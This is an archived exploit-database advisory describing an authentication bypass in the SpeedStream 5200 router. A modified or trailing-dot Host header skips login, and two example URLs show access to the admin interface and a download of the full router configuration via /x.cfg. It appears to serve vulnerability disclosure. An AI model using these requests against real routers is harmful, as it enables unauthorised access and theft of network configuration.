SpeedStream 5200 Authentication Bypass Config Download Vulnerability



EDB-ID: 7055 CVE: 2008-6916 OSVDB-ID: 49870
Author: hkm Published: 2008-11-07 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
 
Prev Home Next 

######################################################################################

 SpeedStream 5200 Authentication Bypass - hkm 12/10/2008
 (Server: NetPort Software 1.1)

 It is posible to bypass authentication by modifying the Host header.
 If you use a Host that is not the authentic one it will not require authentication.

 http://189.255.255.255./          -  This would bypass authentication too.
 http://189.255.255.255./x.cfg     -  This downloads the full router conifguration.


 hkm [ @ ] hakim.ws
______________________________________________________________________________________
######################################################################################

# milw0rm.com [2008-11-07]

Comments

No comments so far